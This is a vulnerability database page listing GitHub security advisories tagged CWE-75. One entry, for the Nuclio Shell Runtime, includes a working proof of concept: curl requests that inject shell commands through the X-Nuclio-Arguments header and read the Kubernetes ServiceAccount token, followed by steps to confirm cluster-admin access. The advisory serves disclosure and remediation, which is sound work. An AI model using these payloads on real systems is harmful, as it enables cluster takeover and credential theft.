CWE-75
DiscouragedFailure to Sanitize Special Elements into a Different Plane (Special Element Injection)
Abstraction: Class · Status: Draft
The product does not adequately filter user-controlled input for special elements with control implications.
59 vulnerabilities reference this CWE, most recent first.
GHSA-75CQ-Q7QC-2MC2
Vulnerability from github – Published: 2024-04-08 15:30 – Updated: 2024-08-01 15:31TOTOLINK EX200 V4.0.3c.7646_B20201211 was discovered to contain a remote code execution (RCE) vulnerability via the FileName parameter in the setUpgradeFW function.
{
"affected": [],
"aliases": [
"CVE-2024-31809"
],
"database_specific": {
"cwe_ids": [
"CWE-75"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-08T13:15:08Z",
"severity": "HIGH"
},
"details": "TOTOLINK EX200 V4.0.3c.7646_B20201211 was discovered to contain a remote code execution (RCE) vulnerability via the FileName parameter in the setUpgradeFW function.",
"id": "GHSA-75cq-q7qc-2mc2",
"modified": "2024-08-01T15:31:37Z",
"published": "2024-04-08T15:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31809"
},
{
"type": "WEB",
"url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/CI_4_setUpgradeFW/CI.md"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-75QQ-7GC3-2XJR
Vulnerability from github – Published: 2024-03-08 03:31 – Updated: 2026-04-02 21:31An injection issue was addressed with improved input validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to elevate privileges.
{
"affected": [],
"aliases": [
"CVE-2024-23268"
],
"database_specific": {
"cwe_ids": [
"CWE-74",
"CWE-75"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-08T02:15:49Z",
"severity": "HIGH"
},
"details": "An injection issue was addressed with improved input validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to elevate privileges.",
"id": "GHSA-75qq-7gc3-2xjr",
"modified": "2026-04-02T21:31:38Z",
"published": "2024-03-08T03:31:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23268"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120884"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120886"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120895"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT214083"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT214084"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT214085"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214083"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214084"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214085"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Mar/21"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Mar/22"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Mar/23"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-83PM-7V48-5JP4
Vulnerability from github – Published: 2022-12-27 15:30 – Updated: 2024-10-25 21:41In rdiffweb prior to 2.5.5, lack of sanitisation of characters in SSH key name could allow attacker to inject a hyperlink injection that could allow attacker to redirect victim to malicious websites.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "rdiffweb"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-4721"
],
"database_specific": {
"cwe_ids": [
"CWE-75"
],
"github_reviewed": true,
"github_reviewed_at": "2022-12-30T18:01:57Z",
"nvd_published_at": "2022-12-27T15:15:00Z",
"severity": "MODERATE"
},
"details": "In rdiffweb prior to 2.5.5, lack of sanitisation of characters in SSH key name could allow attacker to inject a hyperlink injection that could allow attacker to redirect victim to malicious websites.",
"id": "GHSA-83pm-7v48-5jp4",
"modified": "2024-10-25T21:41:41Z",
"published": "2022-12-27T15:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4721"
},
{
"type": "WEB",
"url": "https://github.com/ikus060/rdiffweb/commit/6afaae56a29536f0118b3380d296c416aa6d078d"
},
{
"type": "PACKAGE",
"url": "https://github.com/ikus060/rdiffweb"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/rdiffweb/PYSEC-2022-43007.yaml"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/3c48ef5d-da4d-4ee4-aaca-af65e7273720"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "rdiffweb vulnerable to Special Element Injection"
}
GHSA-85X9-4HM3-78M9
Vulnerability from github – Published: 2024-09-23 21:30 – Updated: 2024-09-23 21:30WoodWing Elvis DAM v6.98.1 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the Apache Ant script functionality.
{
"affected": [],
"aliases": [
"CVE-2024-37779"
],
"database_specific": {
"cwe_ids": [
"CWE-75",
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-23T20:15:04Z",
"severity": "MODERATE"
},
"details": "WoodWing Elvis DAM v6.98.1 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the Apache Ant script functionality.",
"id": "GHSA-85x9-4hm3-78m9",
"modified": "2024-09-23T21:30:47Z",
"published": "2024-09-23T21:30:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37779"
},
{
"type": "WEB",
"url": "https://medium.com/%40daviddepaulasantos/our-brand-new-cve-authenticated-remote-code-execution-rce-on-elvis-dam-c544d879ef1e"
},
{
"type": "WEB",
"url": "https://www.woodwing.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-88F9-7XXH-C688
Vulnerability from github – Published: 2021-08-30 16:11 – Updated: 2022-08-16 18:38Impact
Authenticated users, regardless of their privileges (User or Admin), can leak the value of any configuration entry of the dotenv file, e.g. the application secret (APP_KEY) and various passwords (email, database, etc).
Patches
This issue was addressed by improving UpdateConfigCommandHandler and preventing the use of nested variables in the resulting dotenv configuration file.
Workarounds
Only allow trusted source IP addresses to access to the administration dashboard.
References
Further technical details are available at https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection.
For more information
If you have any questions or comments about this advisory, you can contact: - The original reporters, by sending an email to vulnerability.research [at] sonarsource.com; - The maintainers, by opening an issue on this repository.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.5.0"
},
"package": {
"ecosystem": "Packagist",
"name": "cachethq/cachet"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-39174"
],
"database_specific": {
"cwe_ids": [
"CWE-75"
],
"github_reviewed": true,
"github_reviewed_at": "2021-08-27T23:34:07Z",
"nvd_published_at": "2021-08-28T00:15:00Z",
"severity": "HIGH"
},
"details": "### Impact\n\nAuthenticated users, regardless of their privileges (_User_ or _Admin_), can leak the value of any configuration entry of the dotenv file, e.g. the application secret (`APP_KEY`) and various passwords (email, database, etc). \n\n### Patches\n\nThis issue was addressed by improving `UpdateConfigCommandHandler` and preventing the use of nested variables in the resulting dotenv configuration file.\n\n### Workarounds\n\nOnly allow trusted source IP addresses to access to the administration dashboard.\n\n### References\n\nFurther technical details are available at [https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection](https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection).\n\n### For more information\n\nIf you have any questions or comments about this advisory, you can contact:\n- The original reporters, by sending an email to vulnerability.research [at] sonarsource.com;\n- The maintainers, by opening an issue on this repository.\n",
"id": "GHSA-88f9-7xxh-c688",
"modified": "2022-08-16T18:38:53Z",
"published": "2021-08-30T16:11:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fiveai/Cachet/security/advisories/GHSA-88f9-7xxh-c688"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39174"
},
{
"type": "WEB",
"url": "https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection"
},
{
"type": "PACKAGE",
"url": "https://github.com/cachethq/Cachet"
},
{
"type": "WEB",
"url": "https://github.com/fiveai/Cachet/releases/tag/v2.5.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Cachet configuration leak"
}
GHSA-8J3M-968H-M85Q
Vulnerability from github – Published: 2024-08-06 18:30 – Updated: 2024-08-07 18:30GL-iNet products AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11, MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16, XE300 v4.3.16, E750 v4.3.12, AP1300/S1300 v4.3.13, and XE3000/X3000 v4.4 were discovered to contain a shell injection vulnerability via the interface check_ovpn_client_config.
{
"affected": [],
"aliases": [
"CVE-2024-39227"
],
"database_specific": {
"cwe_ids": [
"CWE-74",
"CWE-75"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-06T17:15:53Z",
"severity": "CRITICAL"
},
"details": "GL-iNet products AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11, MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16, XE300 v4.3.16, E750 v4.3.12, AP1300/S1300 v4.3.13, and XE3000/X3000 v4.4 were discovered to contain a shell injection vulnerability via the interface check_ovpn_client_config.",
"id": "GHSA-8j3m-968h-m85q",
"modified": "2024-08-07T18:30:41Z",
"published": "2024-08-06T18:30:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39227"
},
{
"type": "WEB",
"url": "https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Access%20to%20the%20C%20library%20without%20logging%20in.md"
},
{
"type": "WEB",
"url": "http://ar750ar750sar300mar300m16mt300n-v2b1300mt1300sft1200x750.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8R5J-GM3J-CX9C
Vulnerability from github – Published: 2024-03-29 18:30 – Updated: 2024-08-02 15:59Server-side Template Injection (SSTI) vulnerability in Winter CMS v.1.2.3 allows a remote attacker to execute arbitrary code via a crafted payload to the CMS Pages field and Plugin components.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wintercms/winter"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.2.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-29686"
],
"database_specific": {
"cwe_ids": [
"CWE-75",
"CWE-97"
],
"github_reviewed": true,
"github_reviewed_at": "2024-03-29T20:15:38Z",
"nvd_published_at": "2024-03-29T16:15:08Z",
"severity": "HIGH"
},
"details": "Server-side Template Injection (SSTI) vulnerability in Winter CMS v.1.2.3 allows a remote attacker to execute arbitrary code via a crafted payload to the CMS Pages field and Plugin components.",
"id": "GHSA-8r5j-gm3j-cx9c",
"modified": "2024-08-02T15:59:38Z",
"published": "2024-03-29T18:30:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29686"
},
{
"type": "WEB",
"url": "https://forum.ksec.co.uk/t/webapps-winter-cms-1-2-3-server-side-template-injection-ssti-authenticated/2779"
},
{
"type": "PACKAGE",
"url": "https://github.com/wintercms/winter"
},
{
"type": "WEB",
"url": "https://wintercms.com/docs/v1.2/docs/cms/themes#template-structure"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/51893"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Winter CMS Server-Side Template Injection (SSTI) vulnerability"
}
GHSA-95FJ-3W7G-4R27
Vulnerability from github – Published: 2026-03-04 21:05 – Updated: 2026-03-06 21:57Summary
This vulnerability exists in Nuclio's Shell Runtime component, allowing attackers with function invocation permissions to inject malicious commands via HTTP request headers, execute arbitrary code with root privileges in function containers, steal ServiceAccount Tokens with cluster-admin level permissions, and ultimately achieve complete control over the entire Kubernetes cluster. Recommended CWE classification: CWE-78 (OS Command Injection).
Nuclio Shell Runtime processes the X-Nuclio-Arguments HTTP header without validation or escaping, directly concatenating user input into shell commands executed via sh -c. This allows arbitrary command injection, enabling attackers to read sensitive files (including ServiceAccount tokens) and access the Kubernetes API with cluster-level privileges.
Details
Vulnerability Description
The Nuclio Shell Runtime component contains a critical command injection vulnerability in how it processes user-supplied arguments. When a function is invoked via HTTP, the runtime reads the X-Nuclio-Arguments header and directly incorporates its value into shell commands without any validation or sanitization.
Root Cause Analysis
Vulnerable Code Location 1: pkg/processor/runtime/shell/runtime.go:289-297
func (s *shell) getCommandArguments(event nuclio.Event) []string {
arguments := event.GetHeaderString(headers.Arguments)
if arguments == "" {
arguments = s.configuration.Arguments
}
return strings.Split(arguments, " ") // No validation performed
}
The function retrieves the X-Nuclio-Arguments header value and splits it by spaces without any validation. Shell metacharacters like ;, |, &&, backticks, and $() are not filtered or escaped.
Vulnerable Code Location 2: pkg/processor/runtime/shell/runtime.go:204-213
if s.commandInPath {
// if the command is an executable, run it as a command with sh -c.
cmd = exec.CommandContext(context, "sh", "-c", strings.Join(command, " "))
} else {
// if the command is a shell script run it with sh(without -c).
cmd = exec.CommandContext(context, "sh", command...)
}
cmd.Stdin = strings.NewReader(string(event.GetBody()))
The runtime joins the command array (which includes user-controlled arguments) into a single string and executes it using sh -c. This execution mode interprets shell metacharacters, enabling command injection.
Attack Flow
- Attacker sends HTTP request to Nuclio function with malicious
X-Nuclio-Argumentsheader - Runtime extracts header value without validation
- Malicious payload is concatenated into shell command
- Command is executed via
sh -cwith root privileges - Attacker executes arbitrary commands (e.g., reading ServiceAccount token)
- Attacker uses stolen token to access Kubernetes API with cluster-admin privileges
PoC
Environment Setup
Prerequisites: - Docker installed - kubectl installed - Helm 3.x installed - 8GB RAM minimum
Step 1: Create Kubernetes Cluster
# Install Kind
curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.20.0/kind-linux-amd64
chmod +x ./kind
sudo mv ./kind /usr/local/bin/kind
# Create cluster with registry configuration
cat > kind-config.yaml <<EOF
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
- role: worker
EOF
kind create cluster --name nuclio-test --config kind-config.yaml
Step 2: Setup Local Registry
# Start registry container
docker run -d -p 5000:5000 --name registry --network kind registry:2
docker network connect kind registry
# Configure containerd on worker node
docker exec nuclio-test-worker bash -c 'cat >> /etc/containerd/config.toml << EOF
[plugins."io.containerd.grpc.v1.cri".registry.mirrors."registry:5000"]
endpoint = ["http://registry:5000"]
[plugins."io.containerd.grpc.v1.cri".registry.configs."registry:5000".tls]
insecure_skip_verify = true
EOF'
docker exec nuclio-test-worker systemctl restart containerd
Step 3: Install Nuclio
# Add Helm repository
helm repo add nuclio https://nuclio.github.io/nuclio/charts
helm repo update
# Install Nuclio 1.15.17
helm install nuclio nuclio/nuclio \
--namespace nuclio \
--create-namespace \
--set registry.pushPullUrl=registry:5000
# Wait for pods to be ready
kubectl wait --for=condition=ready pod -l app.kubernetes.io/name=nuclio -n nuclio --timeout=300s
Step 4: Deploy Vulnerable Function
# Create shell script
cat > echo.sh <<'EOF'
#!/bin/sh
echo "Response from shell function"
EOF
chmod +x echo.sh
# Create project
kubectl apply -f - <<EOF
apiVersion: nuclio.io/v1beta1
kind: NuclioProject
metadata:
name: default
namespace: nuclio
spec:
displayName: Default Project
EOF
# Deploy function
nuctl deploy shell-func \
--path echo.sh \
--runtime shell \
--namespace nuclio \
--registry localhost:5000 \
--run-registry registry:5000 \
--project-name default
# Verify deployment
kubectl -n nuclio get pods -l nuclio.io/function-name=shell-func
Exploitation
Test 1: Verify Command Injection
kubectl run -n nuclio exploit-test \
--image=curlimages/curl:latest \
--rm -i --restart=Never -- \
curl -s -X POST \
-H "Content-Type: text/plain" \
-H "x-nuclio-arguments: ; id ; whoami ;" \
-d "test" \
http://nuclio-shell-func:8080
Expected Output:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
root
Test 2: Extract ServiceAccount Token
kubectl run -n nuclio token-extract \
--image=curlimages/curl:latest \
--rm -i --restart=Never -- \
curl -s -X POST \
-H "Content-Type: text/plain" \
-H "x-nuclio-arguments: ; cat /var/run/secrets/kubernetes.io/serviceaccount/token ;" \
-d "test" \
http://nuclio-shell-func:8080
Expected Output:
eyJhbGciOiJSUzI1NiIsImtpZCI6IldUZFN0d3dod2hSNE8yLWtRZmc0Z0N0UWNtaDMxVDhEVlQyYWRnS3AzbEkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxODAyMzk4Mzg3...
Test 3: Validate Token Privileges
# Extract token from previous output and test permissions
TOKEN="<extracted-token>"
kubectl auth can-i --list --token="$TOKEN"
Expected Output:
Resources Non-Resource URLs Resource Names Verbs
*.* [] [] [*]
[*] [] [*]
This confirms the token has cluster-admin level permissions.
Test 4: Verify Cluster Access
# Test reading secrets
kubectl auth can-i get secrets --all-namespaces --token="$TOKEN"
# Output: yes
# Test creating pods
kubectl auth can-i create pods --all-namespaces --token="$TOKEN"
# Output: yes
Alternative Injection Methods
Backtick Injection:
curl -s -X POST \
-H "Content-Type: text/plain" \
-H 'x-nuclio-arguments: `cat /var/run/secrets/kubernetes.io/serviceaccount/token`' \
-d "test" \
http://nuclio-shell-func:8080
$() Syntax Injection:
curl -s -X POST \
-H "Content-Type: text/plain" \
-H 'x-nuclio-arguments: $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)' \
-d "test" \
http://nuclio-shell-func:8080
Both methods successfully extract the token.
Impact
Severity Assessment
This vulnerability enables complete cluster compromise through a multi-stage attack:
Stage 1: Command Injection - Attacker injects malicious commands via HTTP header - Commands execute with root privileges in function container - No authentication or authorization checks on command content
Stage 2: Credential Theft
- Attacker reads ServiceAccount token from mounted secret
- Token belongs to system:serviceaccount:nuclio:default
- Token has cluster-admin level permissions
Stage 3: Privilege Escalation - Attacker uses stolen token to authenticate to Kubernetes API - Gains full control over all cluster resources - Can read all secrets, create/modify/delete any resource
Affected Resources
Confidentiality Impact: High - All secrets across all namespaces can be read - Database credentials, API keys, certificates exposed - Application data and configuration accessible
Integrity Impact: High - Attacker can modify any cluster resource - Can deploy malicious workloads - Can alter RBAC policies and security controls - Can inject backdoors for persistent access
Availability Impact: Medium - Attacker can delete critical resources - Can deploy resource-intensive workloads causing DoS - Can disrupt cluster operations
Real-World Attack Scenarios
Scenario 1: Data Breach 1. Attacker gains function invocation access (low privilege) 2. Injects command to extract ServiceAccount token 3. Uses token to read all secrets in production namespace 4. Exfiltrates database credentials and API keys 5. Accesses production databases and external services
Scenario 2: Supply Chain Compromise 1. Attacker compromises CI/CD pipeline 2. Deploys malicious Nuclio function 3. Function automatically executes on deployment 4. Establishes persistent backdoor in cluster 5. Pivots to compromise other applications
Scenario 3: Ransomware Attack 1. Attacker exploits vulnerability to gain cluster access 2. Deploys crypto-mining or ransomware pods 3. Encrypts persistent volumes 4. Demands ransom for decryption keys
Severity
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L
CVSS Score: 9.1 (Critical)
Justification: - Attack Vector (Network): Exploitable remotely via HTTP - Attack Complexity (Low): No special conditions required - Privileges Required (Low): Only function invocation permission needed - User Interaction (None): Fully automated exploitation - Scope (Changed): Breaks out of function container to cluster level - Confidentiality (High): Complete access to all secrets - Integrity (High): Full control over cluster resources - Availability (Low): Limited direct availability impact
Affected Versions
- Nuclio: All versions up to and including 1.15.19
- Component: Shell Runtime (
pkg/processor/runtime/shell)
The vulnerability exists in all versions that include the Shell Runtime component, as the vulnerable code pattern has been present since the feature's introduction.
Patched Versions
No patch is currently available. Users should implement workarounds until an official fix is released.
Workarounds
Immediate Mitigation (Choose One)
Option 1: Disable Shell Runtime
Add to Nuclio platform configuration:
platformConfig:
runtimes:
shell:
enabled: false
This completely disables the vulnerable component but breaks existing Shell Runtime functions.
Option 2: Restrict Function Deployment
Limit who can deploy functions using RBAC:
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: nuclio-function-deployer
namespace: nuclio
rules:
- apiGroups: ["nuclio.io"]
resources: ["nucliofunctions"]
verbs: ["create", "update", "patch"]
# Only grant to trusted users
Remove default function deployment permissions from untrusted users.
Option 3: Network Isolation
Restrict egress traffic from function pods:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: nuclio-processor-egress
namespace: nuclio
spec:
podSelector:
matchLabels:
nuclio.io/component: processor
policyTypes:
- Egress
egress:
- to:
- podSelector: {}
ports:
- protocol: TCP
port: 443 # Only allow HTTPS to cluster API
This limits the attacker's ability to exfiltrate data but doesn't prevent the initial exploitation.
Long-Term Fixes
Fix 1: Input Validation
Implement strict validation in getCommandArguments:
import "regexp"
var argumentsRegex = regexp.MustCompile(`^[a-zA-Z0-9_\-=., ]+$`)
func (s *shell) getCommandArguments(event nuclio.Event) []string {
arguments := event.GetHeaderString(headers.Arguments)
if arguments == "" {
arguments = s.configuration.Arguments
}
if !argumentsRegex.MatchString(arguments) {
s.Logger.ErrorWith("Invalid arguments: contains unsafe characters")
return []string{}
}
return strings.Split(arguments, " ")
}
Fix 2: Remove sh -c Execution
Use parameterized command execution:
func (s *shell) processEvent(context context.Context,
command []string,
event nuclio.Event,
responseChan chan nuclio.Response) {
var cmd *exec.Cmd
if len(command) > 0 {
cmd = exec.CommandContext(context, command[0], command[1:]...)
} else {
// Handle error
return
}
cmd.Stdin = strings.NewReader(string(event.GetBody()))
// ... rest of code
}
Fix 3: Limit ServiceAccount Permissions
Create restricted ServiceAccount for function pods:
apiVersion: v1
kind: ServiceAccount
metadata:
name: nuclio-function-sa
namespace: nuclio
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: nuclio-function-role
namespace: nuclio
rules:
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "list"]
# Do not grant secrets or cross-namespace access
Resources
- Nuclio GitHub: https://github.com/nuclio/nuclio
- CWE-78: OS Command Injection: https://cwe.mitre.org/data/definitions/78.html
- OWASP Command Injection: https://owasp.org/www-community/attacks/Command_Injection
- Kubernetes Security Best Practices: https://kubernetes.io/docs/concepts/security/
Credits
credit for: @b0b0haha (603571786@qq.com) @j311yl0v3u (2439839508@qq.com)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.15.9"
},
"package": {
"ecosystem": "Go",
"name": "github.com/nuclio/nuclio"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.15.20"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-29042"
],
"database_specific": {
"cwe_ids": [
"CWE-75"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-04T21:05:51Z",
"nvd_published_at": "2026-03-06T07:16:01Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThis vulnerability exists in Nuclio\u0027s Shell Runtime component, allowing attackers with function invocation permissions to inject malicious commands via HTTP request headers, execute arbitrary code with root privileges in function containers, steal ServiceAccount Tokens with cluster-admin level permissions, and ultimately achieve complete control over the entire Kubernetes cluster. Recommended CWE classification: CWE-78 (OS Command Injection).\n\nNuclio Shell Runtime processes the `X-Nuclio-Arguments` HTTP header without validation or escaping, directly concatenating user input into shell commands executed via `sh -c`. This allows arbitrary command injection, enabling attackers to read sensitive files (including ServiceAccount tokens) and access the Kubernetes API with cluster-level privileges.\n\n## Details\n\n### Vulnerability Description\n\nThe Nuclio Shell Runtime component contains a critical command injection vulnerability in how it processes user-supplied arguments. When a function is invoked via HTTP, the runtime reads the `X-Nuclio-Arguments` header and directly incorporates its value into shell commands without any validation or sanitization.\n\n### Root Cause Analysis\n\n**Vulnerable Code Location 1:** `pkg/processor/runtime/shell/runtime.go:289-297`\n\n```go\nfunc (s *shell) getCommandArguments(event nuclio.Event) []string {\n arguments := event.GetHeaderString(headers.Arguments)\n\n if arguments == \"\" {\n arguments = s.configuration.Arguments\n }\n\n return strings.Split(arguments, \" \") // No validation performed\n}\n```\n\nThe function retrieves the `X-Nuclio-Arguments` header value and splits it by spaces without any validation. Shell metacharacters like `;`, `|`, `\u0026\u0026`, backticks, and `$()` are not filtered or escaped.\n\n**Vulnerable Code Location 2:** `pkg/processor/runtime/shell/runtime.go:204-213`\n\n```go\nif s.commandInPath {\n // if the command is an executable, run it as a command with sh -c.\n cmd = exec.CommandContext(context, \"sh\", \"-c\", strings.Join(command, \" \"))\n} else {\n // if the command is a shell script run it with sh(without -c).\n cmd = exec.CommandContext(context, \"sh\", command...)\n}\n\ncmd.Stdin = strings.NewReader(string(event.GetBody()))\n```\n\nThe runtime joins the command array (which includes user-controlled arguments) into a single string and executes it using `sh -c`. This execution mode interprets shell metacharacters, enabling command injection.\n\n### Attack Flow\n\n1. Attacker sends HTTP request to Nuclio function with malicious `X-Nuclio-Arguments` header\n2. Runtime extracts header value without validation\n3. Malicious payload is concatenated into shell command\n4. Command is executed via `sh -c` with root privileges\n5. Attacker executes arbitrary commands (e.g., reading ServiceAccount token)\n6. Attacker uses stolen token to access Kubernetes API with cluster-admin privileges\n\n## PoC\n\n### Environment Setup\n\n**Prerequisites:**\n- Docker installed\n- kubectl installed\n- Helm 3.x installed\n- 8GB RAM minimum\n\n**Step 1: Create Kubernetes Cluster**\n\n```bash\n# Install Kind\ncurl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.20.0/kind-linux-amd64\nchmod +x ./kind\nsudo mv ./kind /usr/local/bin/kind\n\n# Create cluster with registry configuration\ncat \u003e kind-config.yaml \u003c\u003cEOF\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nnodes:\n- role: control-plane\n- role: worker\nEOF\n\nkind create cluster --name nuclio-test --config kind-config.yaml\n```\n\n**Step 2: Setup Local Registry**\n\n```bash\n# Start registry container\ndocker run -d -p 5000:5000 --name registry --network kind registry:2\ndocker network connect kind registry\n\n# Configure containerd on worker node\ndocker exec nuclio-test-worker bash -c \u0027cat \u003e\u003e /etc/containerd/config.toml \u003c\u003c EOF\n\n[plugins.\"io.containerd.grpc.v1.cri\".registry.mirrors.\"registry:5000\"]\n endpoint = [\"http://registry:5000\"]\n[plugins.\"io.containerd.grpc.v1.cri\".registry.configs.\"registry:5000\".tls]\n insecure_skip_verify = true\nEOF\u0027\n\ndocker exec nuclio-test-worker systemctl restart containerd\n```\n\n**Step 3: Install Nuclio**\n\n```bash\n# Add Helm repository\nhelm repo add nuclio https://nuclio.github.io/nuclio/charts\nhelm repo update\n\n# Install Nuclio 1.15.17\nhelm install nuclio nuclio/nuclio \\\n --namespace nuclio \\\n --create-namespace \\\n --set registry.pushPullUrl=registry:5000\n\n# Wait for pods to be ready\nkubectl wait --for=condition=ready pod -l app.kubernetes.io/name=nuclio -n nuclio --timeout=300s\n```\n\n**Step 4: Deploy Vulnerable Function**\n\n```bash\n# Create shell script\ncat \u003e echo.sh \u003c\u003c\u0027EOF\u0027\n#!/bin/sh\necho \"Response from shell function\"\nEOF\nchmod +x echo.sh\n\n# Create project\nkubectl apply -f - \u003c\u003cEOF\napiVersion: nuclio.io/v1beta1\nkind: NuclioProject\nmetadata:\n name: default\n namespace: nuclio\nspec:\n displayName: Default Project\nEOF\n\n# Deploy function\nnuctl deploy shell-func \\\n --path echo.sh \\\n --runtime shell \\\n --namespace nuclio \\\n --registry localhost:5000 \\\n --run-registry registry:5000 \\\n --project-name default\n\n# Verify deployment\nkubectl -n nuclio get pods -l nuclio.io/function-name=shell-func\n```\n\n### Exploitation\n\n**Test 1: Verify Command Injection**\n\n```bash\nkubectl run -n nuclio exploit-test \\\n --image=curlimages/curl:latest \\\n --rm -i --restart=Never -- \\\n curl -s -X POST \\\n -H \"Content-Type: text/plain\" \\\n -H \"x-nuclio-arguments: ; id ; whoami ;\" \\\n -d \"test\" \\\n http://nuclio-shell-func:8080\n```\n\n**Expected Output:**\n```\nuid=0(root) gid=0(root) 